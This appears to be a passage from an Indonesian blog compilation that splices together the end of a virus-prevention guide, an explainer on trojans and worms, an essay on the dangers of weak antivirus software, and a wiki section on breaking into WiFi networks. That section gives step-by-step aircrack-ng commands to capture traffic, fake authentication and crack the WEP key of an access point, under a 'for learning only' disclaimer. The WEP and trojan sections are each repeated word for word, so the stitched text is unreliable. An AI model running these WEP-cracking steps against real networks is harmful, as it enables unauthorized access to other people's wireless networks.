menyimpan hasil backup dan nama backup yang dimaksud. Secara default adalah menggunakan floppy disk (wew...jadul banget yah...), namun Anda bisa juga melakukan browse dan memilih suatu tempat di hardisk Anda, untuk kemudian nanti di-burn ke CD/DVD. Jika Anda memilih poin 3.d. maka Anda harus memilih folder/file apa saja yang akan dibackup kemudian setelah memilih "Next", baru jendela untuk memilih tempat hasil backup muncul.5) Pilih "Next", dan ditampilkan jendela informasi backup Anda.6) Pilih "Finish", dan Windows akan melakukan backup.7) Pilih "Close" untuk menutup jendela, pilih "Report" untuk melihat laporan proses backup.Untuk melakukan restore data yang sudah dibackup, gunakan cara berikut:1) Buka Backup Utilities dari Start Menu2) Pilih "Next" akan menampilkan pilihan menu untuk melakukan backup atau restore data, pilih "Restore files and settings"3) Pilih "Next" dan tentukan file yang akan Anda restore beserta tempat awal file hasil restore, jika file backup yang dimaksud tidak ada di pilihan, silahkan tekan tombol "Browse" untuk mencari file backup yang dimaksud.4) Pilih "Next" akan menampilkan informasi file backup.5) Pilih "Finish" dan file hasil backup akan di-restore ke lokasi awalnya.Jika Anda masih merasa cukup repot untuk menjalankan tool backup ini, Anda dapat menjadwalkannya melalui Task Scheduler melalui Advanced Mode (begitu juga jika Anda ingin membuat restore point untuk komputer Anda). Saya tidak akan membahas penggunaan Advanced Mode disini.5. Buat image terhadap hardisk Anda (Norton Ghost)Tutorial pembuatan image dengan Norton Ghost dapat dilihat disiniTutorial untuk melakukan restore image dengan Norton Ghost dapat dilihat disini6. "Beku"kan keadaan sistem komputer Anda (Deep Freeze)Deep Freeze merupakan sebuah software keluaran Faronics yang dibuat bertujuan untukTutorial penggunaan Deep Freeze dapat dilihat disini, atau disini untuk lebih jelas (saya copas).7. Lakukan instalasi antivirusUmumnya yang menjadi pertanyaan saat kita akan menginstall antivirus adalah antivirus apa yang terbaik untuk mengatasi virus? Ini sudah menjadi satu pertanyaan klasik yang cukup sulit untuk dijawab, karena setiap hari selalu muncul virus baru, dan kehandalan dari suatu antivirus adalah mendeteksi virus baru tersebut. Ada beberapa website yang ditujukan untuk melakukan perbandingan dan pengujian antara antivirus yang ada dalam mendeteksi virus dan mengatasinya. Beberapa website tersebut diantaranya:- AV Comparatives- AV TestNah, dapat Anda lihat sendiri bukan, bahwa kriteria "terbaik" bagi antivirus yang ada adalah relatif, tergantung dari fungsi yang diujikan dan keperluan Anda. Tapi secara sederhana, saya mengasumsikan bahwa antivirus dengan hasil penilaian akhir > 95% merupakan sebuah antivirus yang baik untuk digunakan.Untuk jenis antivirusnya sendiri saya lebih memilih untuk menggunakan antivirus yang bersifat freeware, daripada harus melakukan pembajakan software dengan mencari crack dan serial. Hal ini didasari atas alasan bahwa kemampuan antivirus free yang ada saat ini tidak kalah dengan antivirus berbayar. Kalau masih ada solusi untuk menggunakan yang gratis kenapa harus mencuri sesuatu yang seharusnya dibayar? Saat artikel ini ditulis, saya juga menggunakan antivirus gratis yang dikeluarkan oleh Grisoft, yaitu AVG 8 Free edition (sudah sepaket antara anti virus dengan anti spyware) dan "menikahkan" antivirus ini dengan antivirus karya anak bangsa sendiri yaitu PC Media Anti Virus (PCMAV) khususnya untuk Real Time Protection/RTP. Merasa masih kurang, saya juga mengintegrasikan database virus dari Clam Anti Virus (ClamAV) dengan PCMAV RTP, sehingga kemampuan deteksi virus oleh PCMAV menjadi lebih lengkap, seperti slogan sebuah iklan produk wanita yang mengatakan bahwa "...perlindungan ganda sehingga tidak mudah tembus..." :p Namun harap diperhatikan juga, biasanya penggunaan antivirus akan menghabiskan memori yang cukup besar. Oleh karena itu, jika memang dirasa cukup menggunakan 1 antivirus akan lebih baik asalkan sering di-update dibandingkan menggunakan banyak antivirus sekaligus (biasanya akan memperlambat kerja komputer). Pada link posting berikut ini terdapat daftar dari antivirus yang cukup umum digunakan beserta tempat untuk mendownloadnya.8. Matikan fungsi autorun (menjalankan otomatis/automatic run) pada driveVirus Indonesia terkenal dengan sifatnya yang mudah menyebar melalui media flash disk. Biasanya eksekusi virus dilakukan melalui penambahan sebuah file "autorun.inf" pada flash disk. File "autorun.inf" ini akan otomatis dijalankan ketika Windows menjalankan fungsi autorun pada removable drive (itu loh, jendela tampilan pilihan yang berisi opsi play with media player, open folder, take no action, dll), atau ketika pengguna komputer melakukan double click pada icon removable drive/flash disk melalui jendela "My Computer". Fungsi autorun tidak berjalan jika pengguna membuka removable drive/flash disk melalui Windows Explorer melalui tampilan "Folder View" (tampilan daftar folder di sebelah kiri jendela "windows explorer" yang dapat diaktifkan dengan menekan icon bertuliskan "Folders" pada "windows explorer"), sehingga jika ada virus yang membuat file "autorun.inf" pada flash disk, file ini tidak akan dijalankan, dan file virus tidak berjalan juga. Namun tentu saja bagi pengguna komputer yang tidak mengerti akan hal ini, mereka bisa tanpa sengaja menjalankan virus melalui eksekusi file "autorun.inf". Jadi, kenapa tidak kita matikan saja fungsi autorun untuk removable drive di Windows XP? Cara untuk mematikan fungsi autorun ini dapat dilakukan dengan melakukan pengaturan policy/kebijakan pada sistem operasi Windows XP. Untuk mematikan autoplay pada semua drive bisa dilakukan dengan cara seperti ini:1) Buka Start menu, kemudian pilih menu "Run" (atau menekan tombol Windows dan r secara bersamaan), ketik gpedit.msc [enter]2) Pilih Computer Configuration > Administrative Templates > System.3) Cari opsi "Turn Off Autoplay" di jendela kanan, kemudian klik kanan dan pilih "Properties".4) Pilih "Enable", dan pada kotak isian "Turn off autoplay on", pilih "All Drive", kemudian tekan tombol "OK"9. Pengaturan tambahan tampilan Windows ExplorerPoin ini saya masukkan dalam artikel ini karena alasan sederhana, bahwa banyak virus yang menyamarkan dirinya menjadi sebuah folder, atau sebuah file dengan icon tertentu, atau menyembunyikan diri (hidden file). Oleh karena itu, pengaturan tambahan tampilan di Windows Explorer ini akan membuat Anda semakin berhati-hati agar tidak sembarangan dalam membuka suatu file. Beberapa pengaturan yang akan saya bahas di poin ini adalah mengenai pengaturan melalui Folder Option, tampilan detail Windows Explorer dan penggantian icon standar Windows.Untuk membuka menu Folder Option, Anda dapat membuka melalui Windows Explorer, kemudian memilih menu Tools > Folder Optionsa. Menampilkan ekstensi file1) Dari tampilan jendela Folder Options, buka tab View.2) Hilangkan tanda ceklist/centang dari opsi "Hide extensions for known file types".b. Menampilkan file yang tersembunyi1) Dari tampilan jendela Folder Options, buka tab View.2) Pilih opsi "Show hidden files and folders" pada bagian "Hidden files and folders".3) [optional] Untuk menampilkan file "super hidden" silahkan hilangkan tanda ceklist/centang dari opsi "Hide protected operating system files (Recommended)", maka selihai apapun suatu file menyembunyikan dirinya, pasti akan terlihat.Untuk menampilkan detail pada Windows Explorer:1) Buka jendela Windows Explorer2) Pilih menu View > DetailsKetika tampilan details dipilih, maka akan ditampilkan informasi tambahan suatu file, jadi jika ada virus yang menyamar menjadi sebuah folder, maka pada bagian type akan tertulis application dan bukan file folder.10. Gaya hidup sehatGaya hidup sehat disini bukanlah gaya hidup yang berhubungan dengan fisik atau tubuh Anda. Yang saya maksud disini adalah bagaimana sikap dan tingkah laku Anda dalam menggunakan komputer. Beberapa contoh gaya hidup sehat dalam berkomputer ini antara lain:a. Jangan mudah percayaMisalnya: jangan sembarang klik-klik application apapun KECUALI Anda tahu aplikasi itu atau kalau Anda percaya dengan pembuatnya, dan jangan penasaran dengan file-file yg namanya "menggoda". 80% PC yg kena virus disebabkan oleh user yang penasaran.b. Jangan ceroboh/tidak hati-hatiMisalnya: Mendownload attachment email dari orang yang tidak Anda kenal, tidak menggunakan antivirus pada komputer Anda, tidak melakukan update terhadap Windows (service pack), dll. Sikap ceroboh seperti yang saya sebutkan tadi mungkin saja bisa berakibat fatal bagi komputer Anda.c. Sopan santunInternet terkenal dengan sifat anonymous/tidak bernama. Seringkali karena sifatnya anonymous banyak hal bisa terjadi, misalnya: seorang dengan profil A di internet ternyata bukanlah A di dunia nyata, atau seseorang membuat profil palsu di internet untuk menipu atau merusak nama baik A di dunia nyata, atau seseorang merasa aman karena unsur anonymous tadi sehingga bersikap tidak menghargai pengguna lain di internet. Ingat, bahwa setiap tindakan kita pasti memiliki konsekuensi. Jadi sehubungan dengan UU-ITE yang berlaku di negara kita, mari kita juga berlaku sopan dalam menggunakan komputer/internet sehingga tidak ada pihak yang merasa dirugikan.d. Saling menghargaiKhususnya bagi Anda yang suka menggunakan software ilegal dan terbiasa dengan menggunakan crack,keygen, dll untuk software berbayar. Saya harap kita bisa menghargai pembuat software dengan membeli produk aslinya, bukan dengan menggunakan cara ilegal untuk mendapatkan software tersebut. Sudah menjadi suatu hal yang umum bahwa yang namanya crack atau keygen sering disusupi virus/trojan/spyware yang dapat menyerang komputer Anda saat Anda menggunakan crack tersebut. Bahkan pada saat Anda men-download crack tersebut, seringkali website tersebut dipenuhi dengan program jahat. Jadi mari kita dukung penggunaan perangkat freeware di komputer kita.Memang tidak semua gaya hidup di atas berhubungan dengan pencegahan virus untuk menginfeksi komputer Anda, namun beberapa hal di atas bisa jadi membantu Anda untuk jadi lebih berhati-hati dalam berkomputer/berinternet.Tips tambahan:1. File yang sering digunakan virus yaitu berekstensi *.exe, *.inf, *.vbs, *.dll, *.scr, *.bat (jika anda yakin, hapuslah file-file yang anda curigai sebagai virus).2. Ciri umum file asli:- jika file document word, berekstensi doc, bertipe file word documents- jika file folder, tidak mempunyai size dan bertipe file folder- dll3. Jangan login menggunakan user Administrator/yang punya hak Administrator pada komputer Anda, tapi login dengan user yang punya akses terbatas/limited access. Dengan demikian jika virus menyerang, kerusakan yang ditimbulkan bisa diminimalkan.4. http://root.wanxp.net/index.php?option=com_content&task=view&id=142&Itemid=865. http://root.wanxp.net/index.php?option=com_content&task=view&id=98&Itemid=866. Yahoo AnswerWahh.. sebenarnya masih banyak cara lain untuk mencegah virus masuk ke komputer (mengaktifkan/menginstall firewall, menggunakan sistem operasi virtual dengan VirtualPC atau VMWare, dll), tapi saya pikir beberapa cara yang sudah saya sampaikan di atas sudah cukup membantu untuk melakukan pencegahan. Tapi...jangan bersedih atau kecewa jika setelah menerapkan cara di atas komputer Anda masih terkena virus (well, too bad actually, karena masih ada peluang 0,01% untuk kena). Pada bagian selanjutnya, saya akan menjelaskan cara-cara yang umum saya lakukan ketika menangani sebuah komputer bervirus, yah sekalian juga berbagi ilmu bagaimana mereparasi komputer yang terkena virus. Semoga bagian kedua artikel ini tidak memakan waktu yang lama untuk saya susun.NB: Sebagian isi artikel ini merupakan kontribusi dari pengguna Yahoo Answer
MENJEBOL JARINGAN WIFI
Teknik Menjebol WEP
From SpeedyWiki
Jump to: navigation, search
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
--------------------------------------------------------------------------------
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan
# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1
Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor
# iwconfig eth1 mode monitor
# iwconfig eth1
# airmon-ng start eth1
# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah
# aireplay-ng -5 -b $AP -h $WIFI eth1
Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan
# aircrack-ng -n 64 hasilcapture.ivs
From SpeedyWiki
Jump to: navigation, search
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
--------------------------------------------------------------------------------
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan
# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1
Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor
# iwconfig eth1 mode monitor
# iwconfig eth1
# airmon-ng start eth1
# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah
# aireplay-ng -5 -b $AP -h $WIFI eth1
Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan
# aircrack-ng -n 64 hasilcapture.ivs
VIRUS TROJAN
Siapa Trojan Horse dan Worm
Boleh dikatakan mereka adalah anak-anak dari malicious code atau nama lainnya Malware, saudara mereka yang satunya yaitu virus sudah diceritakan terlebih dahulu, dan sekarang coba kita lihat cerita pendek mereka berdua. Agar kita bisa lebih memahami cara kerja mereka di dunia maya seperti contoh kasus pencurian account bank yang dilakukan oleh Sinowal Trojan.
Ada banyak sekali cerita dan kasus yang disebabkan oleh virus, worm ataupun Trojan. Contohnya kasus virus macro yang menjangkiti doc Microsoft word. Virus CIH yang dibuat untuk merusak system BIOS, virus ini diperkirakan telah merusak ribuan komputer didunia. Virus Mail My Love yang menggegerkan dunia. Kasus Worm tercatat yang paling banyak ditemukan, contoh kasus terbesar yaitu Worm Nimda, Sircam dan Code Red dengan variannya yang membuat macem situs dan jaringan LAN perusahaan didunia, dimana worm tersebut melakukan komunikasi palsu yang menyebabkan jaringan tersendat. Nimda merupakan kebalikan dari Admin. Di awal 2003 ini, virus worm Slammer hanya membutuhkan waktu 10 menit untuk membuat chaos pengguna internet. Dalam menit pertama penyebarannya, jumlah virus Slammer berlipat dua kali setiap 8,5 detik. Kecepatannya jauh di atas worm Code Red - yang menyebar 18 bulan lalu yang berlipat dua setiap 37 menit. Sobig dengan variannya yang telah membuat beberapa ISP dunia macet karena banjirnya. Data kasus tersebut diperoleh dari sini
Trojan Horse
Kuda Troya diambil namanya dari fabel sastra besar Homer. Istilah ini berasal dari mitologi Yunani, pada saat Yunani sedang perang menghadapi pasukan Troy. Yunani telah mengepung kota Troy beberapa tahun, tetapi kota Troy tidak dapat jatuh ke tangan Yunani. Akhirnya Yunani membuat strategi kuda raksasa dari kayu, uniknya dalam perut kuda ini berongga sehingga dapat diisi banyak pasukan Yunani. Kemudian kuda ini dihadiahkan ke penduduk Troy, dengan bantuan spionase Yunani penduduk Troy berhasil diyakinkan untuk memasukkan kuda kayu ke dalam kota. Pada malam hari pasukan Yunani yang berada di dalam kuda tersebut keluar dan membuka gerbang kota Troy yang akhirnya kota Troy dapat jatuh ketangan Yunani.
Trojan horse dalam dunia komputer digunakan untuk menamai program-program yang tampaknya baik, tetapi didalamnya menyimpan maksud-maksud jahat, misalnya mencuri password, mengontrol komputer dari jarak jauh, dan lain-lain. Proses yang dilakukan yaitu seorang user A menaruh program atau kode biner yang tampaknya bagus dan membuat user lain ingin mendownload-nya kemudian menjalankannya sebagai root. Setelah didownload dan dijalankan, kemudian user A tersebut dapat mengganggu sistem user lain (user B) sementara user B tidak memperhatikan. User B berpikir bahwa file kode biner yang diambilnya baik hanya melakukan satu hal (dan mungkin sangat baik).
Perlu diingat bahwa seorang user tidak akan pernah tahu apa yang sesungguhnya terjadi bila dia menjalankan suatu program. Sebagai gambaran bila seorang user dihadapkan pada suatu tampilan program dengan suatu tombol yang bertuliskan “close”, user tersebut tidak akan pernah tahu aksi sesungguhnya, apakah aksi penekanan tombol tersebut akan dapat menutup aplikasi program atau aksi yang lain. Aksi yang kasat mata kemungkinan hanya diketahui oleh si pembuat program, misalnya untuk mencuri password atau bahkan memformat hardisk komputer user. Perlu diwaspadai terhadap program apa yang diinstal di dalam suatu mesin. Linux menyediakan chekshum MD5, dan tanda PGP, file RPM sehingga anda dapat melakukan verifikasi bahwa anda menginstal hal yang sebenarnya. Distribusi lain memiliki metode yang serupa. Sebaiknya tidak menjalankan sembarang file biner yang kode sumbernya tidak dikenal sebagai root. Sedikit penyerang yang bersedia mengeluarkan kode sumber untuk dilihat publik. Meski dapat menjadi komplek, usahakan untuk dapat memperoleh kode sumber beberapa program dari situs distribusi sebenarnya. Jika program akan berjalan sebagai root usahakan seseorang yang dipercaya telah melihat kode sumber dan melakukan verifikasi.
Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya Trojan Horse dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri “berlagak" sebagai utility program. Contoh Trojan Horse: Win-Trojan/Back Orifice, Win-Trojan/SubSeven, Win-Trojan/Ecokys (Korean). Trojan Horse masih dapat dibagi lagi menjadi:
• DOS Trojan Horse : Trojan Horse ini berjalan di DOS. Trojan Horse jenis ini akan mengurangi kecepatan komputer atau menghapus file-file pada hari atau situasi tertentu.
• Windows Trojan Horse : Trojan Horse ini digunakan sebagai program untuk hacking dengan tujuan jahat yang dapat mengkoleksi informasi dari komputer yang tersambung internet. Trojan Horse jenis ini berjalan di system Microsoft
Windows. Jumlah Windows Trojan Horse meningkat sejak 1998
Worm
Worm sama juga dengan program-program aplikasi komputer yang ada di komputer. Perbedaannya worm mampu menggandakan diri atau kamuflase. Worm memiliki perbedaan dengan virus, karena virus menggandakan diri dengan menginfeksi suatu file, sedangkan worm tidak menginfeksi file apapun. Worm juga mempunyai payload, tentunya dibuat sesuai keinginan programernya. Seiring perubahan waktu worm bersifat menyerupai virus. Jadi ada malicious yang mempunyai karakter virus dan juga karakter worm sekaligus.
Perkara kamuflase dalam worm digunakan untuk mengelabui para pengguna komputer,
diantaranya dari nama file yang digunakan. Worm menggunakan nama-nama yang memanfaatkan sifat keingintahuan para user. Worm ditujukan kepada program yang mengkopi dirinya sendiri ke (hanya) memory komputer. Perbedaan mendasar dari worm dan virus yaitu proses penginfeksian yang terjadi sampai menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya bersarang di memory. Worm pada awalnya diketemukan di large computer (1970-an), dan akhir- akhir ini saja diketemukan di komputer kecil seperti PC. Terutama sejak 1999, dimana worm banyak beredar melalui media email.
Boleh dikatakan mereka adalah anak-anak dari malicious code atau nama lainnya Malware, saudara mereka yang satunya yaitu virus sudah diceritakan terlebih dahulu, dan sekarang coba kita lihat cerita pendek mereka berdua. Agar kita bisa lebih memahami cara kerja mereka di dunia maya seperti contoh kasus pencurian account bank yang dilakukan oleh Sinowal Trojan.
Ada banyak sekali cerita dan kasus yang disebabkan oleh virus, worm ataupun Trojan. Contohnya kasus virus macro yang menjangkiti doc Microsoft word. Virus CIH yang dibuat untuk merusak system BIOS, virus ini diperkirakan telah merusak ribuan komputer didunia. Virus Mail My Love yang menggegerkan dunia. Kasus Worm tercatat yang paling banyak ditemukan, contoh kasus terbesar yaitu Worm Nimda, Sircam dan Code Red dengan variannya yang membuat macem situs dan jaringan LAN perusahaan didunia, dimana worm tersebut melakukan komunikasi palsu yang menyebabkan jaringan tersendat. Nimda merupakan kebalikan dari Admin. Di awal 2003 ini, virus worm Slammer hanya membutuhkan waktu 10 menit untuk membuat chaos pengguna internet. Dalam menit pertama penyebarannya, jumlah virus Slammer berlipat dua kali setiap 8,5 detik. Kecepatannya jauh di atas worm Code Red - yang menyebar 18 bulan lalu yang berlipat dua setiap 37 menit. Sobig dengan variannya yang telah membuat beberapa ISP dunia macet karena banjirnya. Data kasus tersebut diperoleh dari sini
Trojan Horse
Kuda Troya diambil namanya dari fabel sastra besar Homer. Istilah ini berasal dari mitologi Yunani, pada saat Yunani sedang perang menghadapi pasukan Troy. Yunani telah mengepung kota Troy beberapa tahun, tetapi kota Troy tidak dapat jatuh ke tangan Yunani. Akhirnya Yunani membuat strategi kuda raksasa dari kayu, uniknya dalam perut kuda ini berongga sehingga dapat diisi banyak pasukan Yunani. Kemudian kuda ini dihadiahkan ke penduduk Troy, dengan bantuan spionase Yunani penduduk Troy berhasil diyakinkan untuk memasukkan kuda kayu ke dalam kota. Pada malam hari pasukan Yunani yang berada di dalam kuda tersebut keluar dan membuka gerbang kota Troy yang akhirnya kota Troy dapat jatuh ketangan Yunani.
Trojan horse dalam dunia komputer digunakan untuk menamai program-program yang tampaknya baik, tetapi didalamnya menyimpan maksud-maksud jahat, misalnya mencuri password, mengontrol komputer dari jarak jauh, dan lain-lain. Proses yang dilakukan yaitu seorang user A menaruh program atau kode biner yang tampaknya bagus dan membuat user lain ingin mendownload-nya kemudian menjalankannya sebagai root. Setelah didownload dan dijalankan, kemudian user A tersebut dapat mengganggu sistem user lain (user B) sementara user B tidak memperhatikan. User B berpikir bahwa file kode biner yang diambilnya baik hanya melakukan satu hal (dan mungkin sangat baik).
Perlu diingat bahwa seorang user tidak akan pernah tahu apa yang sesungguhnya terjadi bila dia menjalankan suatu program. Sebagai gambaran bila seorang user dihadapkan pada suatu tampilan program dengan suatu tombol yang bertuliskan “close”, user tersebut tidak akan pernah tahu aksi sesungguhnya, apakah aksi penekanan tombol tersebut akan dapat menutup aplikasi program atau aksi yang lain. Aksi yang kasat mata kemungkinan hanya diketahui oleh si pembuat program, misalnya untuk mencuri password atau bahkan memformat hardisk komputer user. Perlu diwaspadai terhadap program apa yang diinstal di dalam suatu mesin. Linux menyediakan chekshum MD5, dan tanda PGP, file RPM sehingga anda dapat melakukan verifikasi bahwa anda menginstal hal yang sebenarnya. Distribusi lain memiliki metode yang serupa. Sebaiknya tidak menjalankan sembarang file biner yang kode sumbernya tidak dikenal sebagai root. Sedikit penyerang yang bersedia mengeluarkan kode sumber untuk dilihat publik. Meski dapat menjadi komplek, usahakan untuk dapat memperoleh kode sumber beberapa program dari situs distribusi sebenarnya. Jika program akan berjalan sebagai root usahakan seseorang yang dipercaya telah melihat kode sumber dan melakukan verifikasi.
Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya Trojan Horse dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri “berlagak" sebagai utility program. Contoh Trojan Horse: Win-Trojan/Back Orifice, Win-Trojan/SubSeven, Win-Trojan/Ecokys (Korean). Trojan Horse masih dapat dibagi lagi menjadi:
• DOS Trojan Horse : Trojan Horse ini berjalan di DOS. Trojan Horse jenis ini akan mengurangi kecepatan komputer atau menghapus file-file pada hari atau situasi tertentu.
• Windows Trojan Horse : Trojan Horse ini digunakan sebagai program untuk hacking dengan tujuan jahat yang dapat mengkoleksi informasi dari komputer yang tersambung internet. Trojan Horse jenis ini berjalan di system Microsoft
Windows. Jumlah Windows Trojan Horse meningkat sejak 1998
Worm
Worm sama juga dengan program-program aplikasi komputer yang ada di komputer. Perbedaannya worm mampu menggandakan diri atau kamuflase. Worm memiliki perbedaan dengan virus, karena virus menggandakan diri dengan menginfeksi suatu file, sedangkan worm tidak menginfeksi file apapun. Worm juga mempunyai payload, tentunya dibuat sesuai keinginan programernya. Seiring perubahan waktu worm bersifat menyerupai virus. Jadi ada malicious yang mempunyai karakter virus dan juga karakter worm sekaligus.
Perkara kamuflase dalam worm digunakan untuk mengelabui para pengguna komputer,
diantaranya dari nama file yang digunakan. Worm menggunakan nama-nama yang memanfaatkan sifat keingintahuan para user. Worm ditujukan kepada program yang mengkopi dirinya sendiri ke (hanya) memory komputer. Perbedaan mendasar dari worm dan virus yaitu proses penginfeksian yang terjadi sampai menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya bersarang di memory. Worm pada awalnya diketemukan di large computer (1970-an), dan akhir- akhir ini saja diketemukan di komputer kecil seperti PC. Terutama sejak 1999, dimana worm banyak beredar melalui media email.
BAHAYA PROGRAM AV
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
Sejak pertama ditemukan virus telah mengalami perkembangan teknologi yang cukup besar, demikian juga program Antivirus yang ada. Sayangnya perkembangan Antivirus biasanya hanya mengejar perkembangan virus dan bukan berusaha mendahuluinya. Antivirus yang ketinggalan (teknologinya) justru dapat mengundang bahaya bagi pemakai.
Ketika virus-virus berhasil dideteksi keberadaannya, virus-virus yang baru selalu bermunculan dengan teknologi yang lebih canggih yang membuat antivirus menjadi tak berdaya . Antivirus yang lama misalnya, selalu dapat di-'tipu' dengan teknologi stealth, dengan demikian ketika antivirus ini berusaha mendeteksi file-file yang lain, virus yang stealth tadi justru menyebarkan dirinya ke setiap file yang diperiksa.
Di berbagai majalah tentunya Anda sering melihat adanya program-program antivirus " satuan " (spesifik) yang tujuannya untuk mendeteksi satu jenis virus. Biasanya para pembuat antivirus tidak memberitahukan cara-cara yang benar untuk menggunakan program antivirus ini, padahal antivirus spesifik memiliki risiko yang besar jika tidak digunakan secara benar.
Antivirus spesifik hanya mampu mendeteksi satu jenis virus (dan mungkin beberapa variannya) dan biasanya mampu melumpuhkan virus di memori. Jika Anda menemukan suatu virus dan Anda yakin nama virusnya Anda bisa menggunakan Antivirus semacam ini, namun jika Anda tidak tahu, sebaiknya jangan coba-coba. Jika ternyata virus yang aktif adalah virus lain, yang tentunya tidak terdeteksi oleh antivirus ini, maka antivirus tersebut justru dapat menyebarkan virus yang ada ke seluruh file program yang diperiksanya.
Bahaya yang lebih menakutkan adalah jika antivirus salah mendeteksi suatu virus dan salah membersihkannya sehingga file program yang Anda coba untuk perbaiki justru menjadi rusak. Kejadian ini pernah terjadi misalnya pada kasus virus DenHard, virus ini benar-benar mirip dengan die hard, namun virus ini menggunakan teknik yang berbeda untuk mengembalikan header file yang asli, beberapa antivirus yang berusaha membersihkannya justru merusakkan file program tempat virus itu berada. Selain terjadi pada kasus virus DenHard, kasus inipun pernah (dan mungkin masih akan terus) terjadi pada beberapa virus. Salah satu alasan para pembuat virus membuat virus yang mirip adalah supaya virus tersebut sulit dibersihkan, karena para pembuat antivirus tidak suka jika virusnya dapat dengan mudah dibersihkan oleh user.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
SUMBER BAHAYA PROGRAM ANTIVIRUS
Program Antivirus bisa berbahaya karena sebab-sebab berikut:
Beberapa program antivirus hanya menggunakan teknik sederhana yang bisa dengan mudah di-tipu oleh pembuat virus Misalnya program antivirus hanya memeriksa beberapa byte di awal virus, pembuat virus bisa saja membuat virus versi lain yang sama di bagian awal tetapi berbeda di bagian-bagian yang penting, misalnya di rutin enkripsi/dekripsi header file asli. Ini akan membuat program antivirus menjadi perusak file bukan penyelamat file. Beberapa antivirus juga dapat di tipu dengan mengubah-ubah file signature antivirus. File signature merupakan file yang berisi ID dari setiap virus yang dikenal oleh antivirus, jika ID tersebut di ubah maka antivirus tidak akan mengenalnya. Antivirus yang baik seharusnya dapat memeriksa jika file signature-nya berubah.
Program Antivirus tidak membuat backup file yang dibersihkan. Sering program antivirus (terutama yang spesifik) tidak menyediakan sarana untuk membuat backup file yang dibersihkan, padahal ini sangat penting andaikata proses pembersihan gagal.
Program Antivirus tidak melakukan self check. Self check itu perlu, program antivirus dapat saja diubah oleh orang lain sebelum sampai ke tangan pengguna. Program-program antivirus komersial biasanya melakukan self check untuk memastikan dirinya tidak diubah oleh siapapun, namun ada juga yang tidak dan ini berbahaya. Pada program-program antivirus lokal, yang sering disertakan pada beberapa artikel komputer, biasanya menyertakan source code-nya, sebaiknya Anda mengcompile sendiri source tersebut jika Anda ragu pada keaslian file exe-nya.
Program Antivirus residen bisa di matikan dengan mudah Antivirus residen yang baik seharusnya tidak bisa dideteksi dan di uninstall dengan mudah. Contoh antivirus residen yang kurang baik adalah VSAFE (ada di paket DOS). VSAFE bisa dideteksi dan dimatikan dengan menggunakan interrupt (coba Anda pelajari/debug program vsafe yang ada di DOS agar Anda mengerti). Pemakai akan mendapatkan rasa aman yang palsu dengan menggunakan antivirus semacam ini. Tidak ada rasa aman justru lebih baik dari rasa aman yang palsu.
Program antivirus tidak memberi peringatan kadaluarsa. Seiring dengan berjalannya waktu, virus-virus yang bermunculan semakin banyak dan tekniknya semakin canggih. Program antivirus yang baik sebaiknya memberi peringatan jika Antivirus yang digunakan sudah terlalu out of date. Ini penting supaya kejadian antivirus yang menyebarkan virus tidak terulang.
